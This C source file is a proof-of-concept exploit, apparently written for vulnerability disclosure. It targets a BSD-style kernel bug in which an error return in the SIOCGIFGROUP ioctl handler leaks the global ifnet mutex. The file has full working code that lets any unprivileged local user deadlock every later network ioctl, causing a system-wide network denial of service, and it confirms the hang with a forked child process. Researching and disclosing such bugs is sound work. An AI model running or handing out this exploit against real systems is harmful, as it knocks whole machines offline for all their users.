/*
 * DF-0272 — SIOCGIFGROUP ifnet_mtx leak PoC (unprivileged DoS)
 *
 * Triggers the missing-ifnet_unlock-on-error-path bug in ifioctl()'s
 * SIOCGIFGROUP handler at sys/net/if.c:2403-2407.
 *
 * ifnet_lock() is taken at sys/net/if.c:2029; the SIOCGIFGROUP case
 * unconditionally does `return (error)` from if_getgroups() instead of
 * `break`, bypassing ifnet_unlock() at line 2450. Once leaked, the
 * global `ifnet_mtx` (sys/net/if.c:195, MTX_INITIALIZER("ifnet")) is
 * held forever by the calling thread; every subsequent ifnet_lock()
 * attempt by any thread blocks forever -> system-wide network DoS.
 *
 * Privilege model: SIOCGIFGROUP has NO caps_priv_check (unlike
 * SIOCAIFGROUP/SIOCDIFGROUP at lines 2387/2396 which need
 * SYSCAP_NONET_IFCONFIG, and SIOCSIFDESCR at line 2101 which needs
 * SYSCAP_RESTRICTEDROOT). So ANY local user with a UDP socket can
 * trigger the leak.
 *
 * Trigger condition: if_getgroups() returns EINVAL when
 * ifgr->ifgr_len is non-zero and != the real per-iface group count
 * (sys/net/if.c:1281-1283). We probe with len=0 to learn the real
 * count, then send len=count+1 to force EINVAL -> ifnet_mtx leaked.
 *
 * After the leak, a second network operation that needs ifnet_lock()
 * blocks forever. We fork a child, give it SIGALRM after a few seconds
 * to prove it actually blocked (vs. returning quickly), then report.
 */

#include <sys/param.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <net/if.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

/*
 * Interface every SIOCGIFGROUP request in this file is issued against.
 * Both the pointer and the string are const: nothing reassigns it.
 */
static const char *const IFNAME = "lo0";

/*
 * Issue one SIOCGIFGROUP ioctl for IFNAME on socket `s`.
 *
 * The request structure is zeroed, then ifgr_len is preset to `len`
 * before the call.  If the ioctl succeeds and `out_len` is non-NULL,
 * the ifgr_len value left in the request after the call is stored
 * through it; on failure `*out_len` is left untouched.
 *
 * Returns the ioctl() return value unchanged (errno is set by ioctl()).
 */
static int
do_getgroups(int s, u_int len, u_int *out_len)
{
	struct ifgroupreq req;
	int error;

	memset(&req, 0, sizeof(req));
	req.ifgr_len = len;
	strlcpy(req.ifgr_name, IFNAME, IFNAMSIZ);

	error = ioctl(s, SIOCGIFGROUP, &req);
	if (error != 0 || out_len == NULL)
		return error;

	*out_len = req.ifgr_len;
	return 0;
}

/*
 * Flag raised by the SIGALRM handler below.  It is a volatile
 * sig_atomic_t so it can be written from the handler and read from
 * normal code.
 */
static volatile sig_atomic_t alarm_fired = 0;

/* SIGALRM handler: only records that the alarm went off. */
static void
on_alrm(int sig)
{
	(void)sig;	/* signal number is not needed */
	alarm_fired = 1;
}

/*
 * Probe the interface's group length, issue a SIOCGIFGROUP request with a
 * deliberately mismatched length, then fork a child that issues one more
 * SIOCGIFGROUP and check whether that child ever comes back.
 *
 * A single machine-readable "RESULT: ..." line is written to stdout;
 * diagnostics go to stderr.
 *
 * Exit status:
 *   0  the child was still blocked, or its alarm fired during the ioctl
 *   1  the child's ioctl returned before the alarm (no deadlock observed)
 *   2  setup failure or inconclusive outcome
 */
int
main(void)
{
	/* Child exit codes and timing, named so parent and child agree. */
	enum {
		CHILD_BLOCKED = 0,	/* alarm fired before the ioctl returned */
		CHILD_RETURNED = 1,	/* ioctl returned before the alarm */
		CHILD_SETUP_FAILED = 2,	/* child never reached the ioctl */
		ALARM_SECS = 5,
		WAIT_SECS = 6
	};
	int s, rc, err;
	u_int real_len = 0;

	s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) { perror("socket"); return 2; }

	/* Step 1: probe real group length (len=0 path returns 0 and fills len). */
	rc = do_getgroups(s, 0, &real_len);
	if (rc < 0) {
		/* Save errno first: it must not be re-read after other calls. */
		err = errno;
		fprintf(stderr, "[!] probe ioctl failed: %s (errno=%d)\n",
		        strerror(err), err);
		fprintf(stderr, "[!] trying len=1 blindly to force EINVAL\n");
		real_len = 0; /* unknown; len=1 almost certainly won't match */
	} else {
		fprintf(stderr, "[*] %s real group_len=%u\n", IFNAME, real_len);
	}

	/* Step 2: trigger the EINVAL path with a deliberately-wrong length.
	 * The handler does `return (error)` instead of `break`, leaking
	 * the global ifnet_mtx acquired at sys/net/if.c:2029. */
	u_int bad_len = (real_len == 0) ? 1 : real_len + 1;
	errno = 0;
	rc = do_getgroups(s, bad_len, NULL);
	err = errno;
	fprintf(stderr,
	    "[+] trigger ioctl (len=%u) rc=%d errno=%d (%s)\n",
	    bad_len, rc, err, rc ? strerror(err) : "no error");
	if (rc == 0) {
		fprintf(stderr,
		    "[?] trigger did NOT error — group count changed? retrying with len=99\n");
		errno = 0;
		rc = do_getgroups(s, 99, NULL);
		err = errno;
		/* Report the retry too, so a silent non-trigger is visible. */
		fprintf(stderr,
		    "[+] retry ioctl (len=99) rc=%d errno=%d (%s)\n",
		    rc, err, rc ? strerror(err) : "no error");
	}
	close(s);

	/* Step 3: ifnet_mtx is now expected to be permanently held. Any
	 * subsequent call into ifioctl() that reaches ifnet_lock() blocks
	 * forever. We demonstrate this by forking a child that issues
	 * another SIOCGIFGROUP on a fresh socket with a SIGALRM armed. */
	fflush(stderr);
	pid_t pid = fork();
	if (pid < 0) { perror("fork"); return 2; }
	if (pid == 0) {
		/* child: only async-signal-safe style exits via _exit() */
		struct sigaction sa;
		memset(&sa, 0, sizeof(sa));
		sa.sa_handler = on_alrm;
		sigemptyset(&sa.sa_mask);
		if (sigaction(SIGALRM, &sa, NULL) < 0)
			_exit(CHILD_SETUP_FAILED);
		alarm(ALARM_SECS);
		int s2 = socket(AF_INET, SOCK_DGRAM, 0);
		if (s2 < 0)
			_exit(CHILD_SETUP_FAILED);
		/* this should NEVER return on a vulnerable kernel */
		do_getgroups(s2, 0, NULL);
		close(s2);
		_exit(alarm_fired ? CHILD_BLOCKED : CHILD_RETURNED);
	}

	int status = 0;
	pid_t w;
	/* Give the child WAIT_SECS seconds (one more than its alarm). If it
	 * has not exited by then, it is stuck inside the ioctl; if it has,
	 * its exit code says whether the alarm fired before the ioctl
	 * returned. */
	sleep(WAIT_SECS);
	w = waitpid(pid, &status, WNOHANG);
	if (w < 0) {
		/* status is meaningless here; do not interpret it. */
		perror("waitpid");
		printf("RESULT: INCONCLUSIVE\n");
		return 2;
	}
	if (w == 0) {
		/* child still running — likely blocked in ioctl */
		fprintf(stderr,
		    "[!] child PID %d still alive after %d s — DEADLOCK CONFIRMED\n",
		    (int)pid, (int)WAIT_SECS);
		/* Emit the verdict BEFORE trying to reap: a child blocked
		 * uninterruptibly may never act on SIGKILL, and a blocking
		 * waitpid() here would hang the parent without a result. */
		printf("RESULT: DEADLOCK_CONFIRMED child_blocked_after_alarm\n");
		fflush(stdout);
		kill(pid, SIGKILL);
		(void)waitpid(pid, &status, WNOHANG); /* best-effort reap */
		return 0;
	}
	if (WIFEXITED(status)) {
		int code = WEXITSTATUS(status);
		if (code == CHILD_BLOCKED) {
			/* alarm fired before ioctl returned => blocked */
			printf("RESULT: DEADLOCK_CONFIRMED alarm_fired_during_ioctl\n");
			return 0;
		}
		if (code == CHILD_SETUP_FAILED) {
			/* The second ioctl was never issued: proves nothing. */
			fprintf(stderr,
			    "[?] child setup failed (code=%d) — second ioctl not attempted\n",
			    code);
			printf("RESULT: INCONCLUSIVE\n");
			return 2;
		}
		fprintf(stderr,
		    "[*] child exited normally (code=%d) — second ioctl returned, NO deadlock\n",
		    code);
		printf("RESULT: NO_DEADLOCK\n");
		return 1;
	}
	fprintf(stderr, "[?] child status=0x%x\n", status);
	printf("RESULT: INCONCLUSIVE\n");
	return 2;
}
